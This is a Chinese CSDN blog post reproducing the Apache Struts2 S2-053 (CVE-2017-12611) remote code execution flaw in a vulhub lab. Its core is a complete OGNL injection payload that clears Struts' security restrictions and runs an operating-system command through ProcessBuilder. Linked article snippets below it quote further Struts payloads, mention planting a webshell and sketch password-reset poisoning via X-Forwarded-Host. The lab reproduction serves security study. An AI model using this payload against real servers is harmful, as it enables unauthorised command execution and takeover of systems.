struts2--(CVE-2017-12611)S2-053

最新推荐文章于 2024-11-17 23:16:03 发布
最新推荐文章于 2024-11-17 23:16:03 发布
阅读量149 收藏
点赞数
文章标签: web安全 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lucky1youzi/article/details/129499368
版权

  • 漏洞简介

在一定条件下,当开发人员在Freemarker标签中使用错误的构造时,可能会导致远程代码执行漏洞

  • 漏洞影响

Struts 2.0.1 - 2.3.33

Struts 2.5 - 2.5.10

  • 复现过程

打开vulhub环境,访问靶场

http://IP:8080/hello.action

上poc

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

执行命令成功

Lucky1youzi
关注
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个漏洞存在于Struts2的Jakarta插件中,该插件处理HTTP请求头中的Content-Type字段时存在缺陷。攻击者可以通过精心构造的HTTP请求,...
S2-045之不能再当脚本小子之格物致知之知行合一
shy的博客
03-05 506
发现奇怪告警 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Type: {\u0028\u0023\u006e\u0069\u006b\u0065\u003d\u0027multipart/form-data\u0027\u0029\u002e\u0028\u0023\u0064\u006d\u003d\u0040\u006f\u0067\u006e\u006c\u002e\u004f\u0067\u006e\u
web攻防】安鸾靶场开发框架Struct2远程命令执行 Struct2-S2-005/S2-053远程代码执行漏洞 靶场实战+学习记录
AAAAAAAAAAAA66的博客
02-15 3962
struct2 远程命令执行01 随便输入一个 k8工具连接 上传冰蝎自带马 冰蝎连接 Struct2远程命令执行02 漏洞地址 http://106.15.50.112:8027/hello.action 漏洞POC %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymp...
S2-053Struts2远程命令执行漏洞(CVE-2017-12611
Unitue_逆流
10-13 8250
实验环境 操作机:Windows 7IP:172.16.11.2 实验工具XAMPP: 一个功能强大的建站集成软件包 可以实现服务器的功能,但是只能自己访问 Firefox: 中文俗称‘火狐’,一个自由及开放源代码网页浏览器漏洞介绍继S2-052之后,Apache Struts 2再次被曝存在远程代码执行漏洞,漏洞编号S2-053CVE编号CVE-2017-1000112。当开发人员在Fr
java struts漏洞_【重大漏洞预警】Struts2远程代码执行漏洞(S2-053/S2-052)
weixin_36170641的博客
03-04 486
原标题:【重大漏洞预警】Struts2远程代码执行漏洞(S2-053/S2-052)Struts远程代码执行漏洞(S2-053)一、漏洞详情漏洞编号:CVE-2017-12611漏洞等级:中级受影响版本:Struts2.0.1-Struts 2.3.33 Struts 2.5- Struts 2.5.10二、漏洞描述当开发者在使用表达式文字,或在Freemarker标签(见下方)下使用强制表达式时...
本地复现Struts2-053漏洞
dmra71403的博客
05-14 726
漏洞环境:http://192.168.253.131/ exp: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.Actio...
xalanjava源码-study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-150
06-05
S2-054、S2-055 和 Jackson 漏洞 CVE-2017-7525、CVE-2017-15095 调查报告 我们发表了一篇总结文章,只总结了要点,便于阅读。推荐给那些想要获得概览或没有空闲时间的人。 SSTtechlog 08 S2-054、S2-055 和 jackson...
struts2-core-2.3.31.jar
10-09
该漏洞与Apache Struts2S2-045)远程代码执行漏洞原理基本相同,均是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过发送恶意的数据包,利用该漏洞在受影响服务器上执行任意...
Struts2-057漏洞检测python脚本
11-04
Struts2-057漏洞,也被称为CVE-2017-9805,是Apache Struts2框架中的一个严重安全漏洞。这个漏洞主要出现在Struts2的`Struts2 REST Plugin`中,允许远程攻击者通过恶意构建的HTTP请求头执行任意系统命令,从而对...
S2-045 struts2-core-2.3.32.jar 相关jar包,测试可用
03-09
目前Struts2官方已经确认漏洞(漏洞编号S2-045,CVE编号:cve-2017-5638),并定级为高危风险。 该漏洞的影响范围:Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10。 修复方式:更新至Struts 2.3.32...
S2-053 远程代码执行漏洞检测与利用
a1b2c3是弱口令
12-12 2766
Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 漏洞记录 漏洞编号:S2-053CVE-2017-12611) 漏洞影响:远程代码执行 影响版本:Struts 2.0.1 -Struts 2.3.33, Stru...
CVE-2017-12611(【S2-053Struts2远程命令执行漏洞)漏洞复现
Jerry____的博客
12-19 3292
一:漏洞描述 Struts2在使用Freemarker模块引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但是由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 二:受影响的版本 Struts 2.0.1-struts 2.3.33 Struts 2.5-Struts 2.5.10 三:环境搭建(192.168.3...
网络安全:数字时代的护城河
X2829352498的博客
11-17 469
网络安全(Cybersecurity)是指通过技术手段和管理措施,保护网络系统、数据及其相关资源免受未经授权的访问、篡改、泄露或破坏。其目标是确保数据的机密性完整性和可用性(CIA 三要素)。网络安全是一个持续发展的领域,面对多变的威胁环境,个人、企业和政府需要协同努力。通过技术手段与管理措施相结合,强化网络安全防护体系,可以有效应对不断升级的安全挑战。正如数字时代的护城河,网络安全是我们保护数据和隐私的重要屏障。
【网络安全 | 漏洞挖掘】通过密码重置污染实现账户接管
等风来
11-17 18
修改 HTTP 请求中的Origin字段,将其设置为攻击者控制的 URL;服务器接受了恶意 Origin 值并生成了对应的重置链接;用户点击邮件中的链接后,被重定向至攻击者的服务器;攻击者拦截并使用重置令牌完成账户接管。
【网络安全 | 漏洞挖掘】在重置密码流程利用请求头实现ATO
最新发布
等风来
11-17 25
接下来,我注意到,如果我在密码重置页面输入受害者的电子邮件,并且拦截这个请求,然后添加一个名为“X-Forwarded-Host”的头并将其设置为我的恶意域名,受害者将收到一封带有密码重置token链接的邮件,并且该链接的域名会被替换为我的恶意域名。在开始的时候,我花了5-6天时间,发现了XSS、IDOR、SQL注入、登录页面漏洞、信息泄露和子域名接管等漏洞,但一直没有找到特别重大的漏洞。然后,我在原始请求中添加了一个名为“X-Forwarded-Host”的头,并将其值设置为我的ngrok服务器域名。
【网络安全】OSI网络安全体系结构
Hacker_Fuchen的博客
11-13 785
OSI安全体系结构是在开放式系统互联(OSI)参考模型的基础上,为了解决网络通信中的安全问题而提出的。随着计算机网络技术的快速发展,数据传输的安全性变得越来越重要。OSI安全体系结构的提出,旨在为网络通信提供一个标准化的安全框架,确保信息在传输过程中的机密性、完整性和可用性。国际标准化组织(ISO)在20世纪80年代提出了OSI参考模型,随后为了应对日益增长的网络安全需求,进一步发展了OSI安全体系结构。
2024年三个月自学手册 网络安全(黑客技术)
2401_85027336的博客
11-14 1018
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全等级测评师
2401_88326591的博客
11-14 367
注释:网络设备主要包括交换机和路由器,网路设备的CPU和内存使用率的峰值一般不高于设备本身处理能力的70%,通信链路中的业务流量不高于网络带宽 的70%为合适;和通信传输提出了安全控制要求,主要对象为广域网、城域网、局域网的通信传输及网络架构等,涉及的安全控制点包括网络架构、通信传输、可信验证。注释:计算机系统资源通常指的是的CPU资源、内存资源、硬盘资源和网络资源,对应到等保即是指设备的CPU(处理能力、存储空间)、网络带宽。4)结构安全是网络安全检查的重点,网络结构的安全关系到整体的安全
【网络安全】记一次APP登录爆破
anquan2233的博客
11-13 494
改写为python代码。密码 + 随机10位。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值